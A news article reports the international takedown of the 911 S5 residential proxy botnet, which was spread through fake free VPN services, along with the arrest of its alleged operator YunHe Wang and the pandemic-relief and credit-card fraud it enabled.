An international law enforcement operation led by the US Department of Justice has taken down a multi-million botnet network linked to large-scale cyberattacks, including fraud, child exploitation, harassment, bomb threats, and export violations.
The botnet network, a residential proxy service known as “911 S5” is believed to have infected over 19M IP addresses, including 613,841 IP addresses located in the US.
“Working with our international partners, the FBI conducted a joint, sequenced cyber operation to dismantle the 911 S5 Botnet — likely the world’s largest botnet ever,” said FBI Director Christopher Wray in a press statement. “The 911 S5 Botnet infected computers in nearly 200 countries and facilitated a whole host of computer-enabled crimes, including financial frauds, identity theft, and child exploitation.”
The bust also included the arrest of a People’s Republic of China national, YunHe Wang, a 35-year-old St. Kitts and Nevis citizen-by-investment, against charges of creating and deploying the malware used to amass a network of infected residential computers.
Using VPNs for deployments
Wang, according to the court documents, used virtual private network (VPN) services like MaskVPN and DewVPN to deliver his malware and operated a pay-per-install model. The malware was alternatively bundled with third-party program files such as pirated versions of licensed software or copyrighted materials.
“Allegedly, Wang created a bunch of sites offering ‘free VPN’ service. VPN is a type of software that creates a virtual encrypted tunnel over the Internet and is used legitimately by organizations to provide remote access for their employees to corporate services,” said Kevin Reed, chief information security officer at Acronis. “In the case of VPN software distributed by Wang, it provided a tunnel for its victims pretending to be a free VPN, but also the tunnel worked in reverse allowing Wang’s customers to access the Internet from the IP address of the unsuspecting victim.”
Wang allegedly managed approximately 150 dedicated servers worldwide, 76 of which he had leased from US-based service providers. “Using the dedicated servers, Wang deployed and managed applications, commanded and controlled the infected devices, operated his 911 S5 service, and provided paying customers with access to proxied IP addresses associated with the infected devices,” the Justice Department said in a press release.
Authorities confirmed Wang was financially motivated with no nation-state connections. Charges against him include conspiracy to commit computer fraud, substantive computer fraud, conspiracy to commit wire fraud, and conspiracy to commit money laundering.
Botnet used for massive frauds
Several 911 S5 customers allegedly targeted many pandemic relief programs, according to the court documents. They used the IP addresses purchased from 911 S5 to conceal their true originating locations.
One such offense includes filing 560,000 fraudulent unemployment insurance claims during the pandemic, originating from compromised IP addresses. This resulted in a confirmed fraudulent loss exceeding $5.9 billion, according to the release. Additionally, the assumed IP addresses were used to fabricate more than 47,000 Economic Injury Disaster Loan (EIDL) applications, amounting to a fraud loss of millions of dollars.
“Law enforcement initially focused on 911 S5 during an investigation of a money laundering and smuggling scheme, where criminal actors in Ghana and the United States used hijacked IP addresses purchased from 911 S5 to place fraudulent orders using stolen credit cards on the Army and Air Force Exchange Service (AAFES) online e-commerce platform known as ShopMyExchange,” authorities said in the release. “Although approximately 2,525 fraudulent orders valued at $5.5 million were submitted, credit card fraud detection systems and federal investigators were able to thwart the bulk of the attempted purchases, reducing the actual loss to approximately $254,000.”
If convicted on all counts, Wang faces a maximum penalty of 65 years in prison. An attorney could not be immediately identified for Wang, according to reports. FBI is operating a webpage to help potential victims check if their devices were compromised.